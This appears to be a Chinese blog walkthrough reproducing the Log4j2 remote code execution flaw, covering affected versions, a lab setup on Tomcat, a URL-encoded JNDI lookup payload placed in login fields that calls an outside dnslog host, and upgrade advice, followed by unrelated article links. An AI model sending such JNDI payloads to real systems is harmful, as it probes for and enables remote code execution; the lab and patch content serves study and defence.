log4j2漏洞复现

  • 漏洞描述
  • 影响版本
  • 漏洞复现
    • 环境准备
    • 靶场搭建
    • 执行命令
  • 修复建议

漏洞描述

Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
Apache Log4j2组件存在远程代码执行漏洞,漏洞利用无需特殊配置,攻击者可直接构造恶意请求,触发远程代码执行。

影响版本

目前受影响的Apache Log4j2版本:

2.0 ≤ Apache Log4j <= 2.14.1

已知受影响应用及组件:
Hadoop Hive
Apache Solr
Apache Struts2
Apache Druid
Apache Log4j SLF4J Binding
spring-boot-strater-log4j2
JBoss Logging 3

更多组件可参考如下链接:

https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages?p=1

漏洞复现

环境准备

感谢weil大佬给我的源码包。
感谢兰秋一大佬给我的xampp。
百度网盘链接:复现环境
提取码:1234

靶场搭建

1、下载xampp,一直next下一步。

2、安装完成显示如下。

3、解压源码.zip,找到xampp安装tomcat的位置,进入webapps,将原来的ROOT更改名称,我这里更改为ROOT123,然后将源码包中的ROOT.war复制到webapps中。

4、启动xampp中的tomcat,环境搭建成功,这里默认开启8080端口。

执行命令

1、登录页面输入账密抓包。

2、构造payload,请求dnslog。

$%7bjndi:dns://sqkl4w.dnslog.cn/test%7d

username参数:
password参数:

修复建议

目前官方已发布Apache Log4j 2.15.1-rc1(测试版)及Apache Log4j 2.15.0(稳定版)修复该漏洞,建议受影响用户可将Apache Log4j所有相关应用到以上版本。
下载链接:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.1-rc1
https://logging.apache.org/log4j/2.x/download.html

声明:以上漏洞复现所使用的环境工具均为测试环境使用,产生的一切法律后果自行承担。

log4j2漏洞复现相关推荐

  1. Log4j2漏洞复现(CVE-2021-44228)

    引言 Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息.Apache Log4j2存在 ...

  2. Apache Log4j2漏洞复现

    0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲.或分或合.起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱 ...

  3. 安全漏洞之Log4j2漏洞复现绕过分析

    0x00 介绍 Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC ...

  4. log4j2漏洞简单复现

    文章目录 0x1 log4j2漏洞简介 0x2 log4j2漏洞验证判断 0x3log4j2漏洞复现利用 0x04 log4j2漏洞修复方式 0x1 log4j2漏洞简介 log4j2原理: log4 ...

  5. Log4j2漏洞发展历程及解决方案

    背景 最近互联网技术圈最火的一件事莫过于Log4j2的漏洞了.同时也涌现出了各类分析文章,关于漏洞的版本.漏洞的原因.漏洞的修复.程序员因此加班等等. 经常看我文章的朋友都知道,面对这样热门有意思的技 ...

  6. [CVE-2022-22965]Spring远程代码执行漏洞复现

    漏洞概述(级别:高危) 续上一次Log4j2后,于2022年03月29日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942.CVE-2022-22965) 攻 ...

  7. 【谦杯Linux】Log4j2漏洞突现,感觉啥项目都要升级了,惨

    今年人类因为疫情,左一针右一针:代码也是不甘落后,各种漏洞,还能怎样?缝缝补补又三年.早在9号收到了Log4j2的漏洞报告,起初没放在心上,听名字以为就是个Apache才会有的漏洞,这里我得甩个锅,都 ...

  8. 成功爬取CVE-2019-9766漏洞复现【CSDN】【1】

    代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...

  9. docker逃逸漏洞复现 cve-2019-5736

    0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现.该漏洞编号为CVE-2019-5736,漏洞影 ...

  10. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

最新文章

  1. 斯坦福CS330 2019秋季课程视频全新上线,专注多任务与元学习
  2. wsasend发送不可靠_架构师总结:kafka 如何保证数据的可靠性和一致性
  3. c语言 python-C语言、Java语言和python语言的区别在哪里
  4. 支付宝支付回调异常_支付宝崩了是怎么回事 支付宝崩了部分用户使用异常现已恢复...
  5. CSS基础(part17)--vertical-align垂直对齐
  6. Context node attribute expand trouble shooting guide
  7. A Web Module That Uses JavaServer Faces Technology: The hello2 Example
  8. labelme安装_语义图像分割-DIGITS2-labelme数据集自动扩展
  9. java 判断值是否设置,获取Java中“-非法访问”设置的当前值
  10. python︱利用dlib和opencv实现简单换脸、人脸对齐、关键点定位与画图
  11. 类的数据成员的一些注意事项
  12. Electron常见问题 30 - 深度填坑之阴影问题
  13. 关于在谷歌浏览器,vue-video-player 实现断点续播,currentTime不生效问题
  14. YoLoV5学习(4)--detect.py程序(预测图片、视频、网络流)逐段讲解~
  15. 在不同linux服务器上复制anaconda的虚拟环境注意事项
  16. 左转向善,右转向恶,2020 年的九大 AI 风向标
  17. linux怎么进入sftp命令行,Linux中SFTP命令
  18. 云计算存储之Ceph是什么?
  19. 严重: 所必需的服务组件启动失败,所以无法启动Tomcat,eclipse:org.apache.catalina.startup.Catalina start
  20. 第19组 Beta(2/3)

热门文章

  1. 使用鼠标右击Gite Bash Here 将本地文件上传到 GitHub
  2. SpringBoot Spring Cloud项目学习汇总
  3. three.js示例之旋转立方体
  4. 在Cfree5里使用多行快捷注释的方法
  5. ios 图片裁剪框架_iOS开发图片剪切
  6. ios微信支付服务器错误,iOS开发之-微信支付
  7. java中 implement_java中implement
  8. excel合并两列内容_WPS-excel简单将几个单元格的内容合并到一起
  9. 服务器获取请求ip地址
  10. iOS添加子控制器(addChildViewController)